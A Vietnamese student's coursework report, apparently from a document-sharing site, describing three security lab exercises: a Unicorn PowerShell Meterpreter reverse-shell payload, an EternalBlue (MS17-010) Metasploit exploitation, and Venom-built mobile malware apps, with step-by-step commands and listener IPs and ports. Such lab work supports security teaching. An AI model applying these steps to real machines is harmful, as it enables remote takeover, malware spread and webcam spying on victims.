Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 10

BỘ GIÁO DỤC VÀ ĐÀO TẠO

TRƯỜNG ĐẠI HỌC GIAO THÔNG VẬN TẢI


PHÂN HIỆU TẠI THÀNH PHỐ HỒ CHÍ MINH

BÁO CÁO BÀI TẬP LỚN

Giảng viên hướng dẫn: Huỳnh Thanh Tâm


Sinh viên thực hiện: Phan Trọng Đài
MSSV: 5951030022
Lớp: CQ.59.ITS

TP. Hồ Chí Minh, Năm 2021


LAB 1
Tấn công bằng Malware với công cụ Unicorn
1. Tổng quan
Magic Unicorn là một công cụ đơn giản dùng để tấn công PowerShell của
Windows và tiêm shellcode thẳng vào bộ nhớ. Công cụ được phát triển dựa trên kỹ
thuật tấn công PowerShell của Matthew Graeber, kỹ thuật bypass (vượt qua) bảo
mật của PowerShell của David Kennedy (TrustedSec) và Josh Kelly đưa ra tại hội
nghị Defcon 18.

2. Cách thực hiện.


Bước 1: Tải Unicorn bằng lệnh sau: git clone
https://github.com/trustedsec/unicorn.git
Bước 2: Di chuyển đến thư mục Unicorn và thực hiện chạy lệnh sau :
python unicorn.py windows/meterpreter/reverse_tcp 192.168.152.128 3434
(trong đó địa chỉ ip là địa chỉ của máy chúng ta đằng sau là port)
Bước 4: Sau khi chạy lệnh ở bước 3 xong ta sẽ được một Malware đổi tên Malware
cho phù hợp .

Bước 5: Thực hiện chạy lệnh sau msfconsole -r unicorn.rc


Bước 6: Phát tán Malware lên máy nạn nhân và thực hiện lần lượt các lệnh sau :
sessions -i 1, load stdapi

Gõ lệnh help để biết thêm về các lệnh tấn công. Sau đó thực hiện tấn công.
LAB 2
Khai thác EternalBlue trên Windows Server bằng
Metasploit
1. Tổng quan
EternalBlue, còn được gọi là MS17-010 , là một lỗ hổng trong giao thức SMB
( Server Message Block ) của Microsoft . SMB cho phép các hệ thống chia sẻ quyền
truy cập vào các tệp, máy in và các tài nguyên khác trên mạng. Lỗ hổng được phép
xảy ra vì các phiên bản trước của SMB có một lỗ hổng cho phép kẻ tấn công thiết
lập kết nối phiên null thông qua đăng nhập ẩn danh. Kẻ tấn công sau đó có thể gửi
các gói không đúng định dạng và cuối cùng thực hiện các lệnh tùy ý trên mục tiêu.

2. Sơ đồ và cách thực hiện


Sơ đồ mô hình.

Các bước thực hiện.


Bước 1: Kiểm tra địa chỉ ip của máy Linux bằng lệnh: ifconfig
Bước 2: Thực hiện tìm kiếm máy bị lỗi bằng nmap theo cú pháp sau: nmap -p445
--script smb-vuln-ms17-010 <target>(trong đó target là địa chỉ ip ở bước 1 ) ví dụ
(p445 --script smb-vuln-ms17-010 192.168.120.28/24)
Sau khi chạy xong phát hiện ra thiết bị có lỗ hổng:

Bước 3: Chạy lệnh msfconsole


Bước 4: đã xác định rằng mục tiêu thực sự dễ bị tổn thương đối với EternalBlue,
chúng ta có thể sử dụng mô-đun khai thác sau từ tìm kiếm chúng ta vừa thực hiện
bằng lệnh use exploit/windows/smb/ms17_010_eternalblue
Bước 5: Chỉ định ip của mục tiêu bằng lệnh set rhosts 192.168.120.125

Bước 6: Đặt máy chủ nghe thành địa chỉ IP của máy cục bộ của chúng ta bằng lệnh
set lhost 192.168.112.129
Set port : set lport 4331

Bước 7: Chạy lệnh bằng run


Đợi thiết lập kết nối sau khi tành công chúng ta dùng lệnh ? để biết chi tiết về các
lệnh khác và bắt đầu khai thác.
Bước 8: Kết quả khi xâm nhập thiết bị mục tiêu
LAB 3
Malware trên Mobile với công cụ Venom
1. Tổng quan
Như chúng ta đã biết Malware (phần mềm ác tính) viết tắt của cụm từ Malicious
Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc
gây hỏng hóc máy tính mà người sử dụng không hề hay biết.
Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần
mềm gián điệp (Trojan) hơn là một virus phá hủy.

2. Sơ đồ và cách thưch hiện


Sơ đồ mô hình.

Các bước thực hiện


Bước 1: Tải venom về và cài đặt và chạy venom

Bước 2: Chọn Android | IOS payload


Bước 3: Chọn 1

Bước 4: Set địa chỉ IP , Port


Bước 5: Đặt tên app

Bước 6: Tiến hành tải app và cài đặt trên máy ảo hoặc máy thực bằng nhiều cách
khác nhau
Sau khi cài đặt thì chúng ta sẽ thực hiện khai thác máy nạn nhân bằng cách dùng
lệnh ? để xem nhiều lệnh khác nhau và thực hiện theo các lệnh đó.

Kết quả:
Sau khi xâm nhập thành công chúng ta có thể dùng nhiều lệnh khác nhau để kiểm
tra ví dụ như lệnh webcam_snap ta được kết quả sau:

You might also like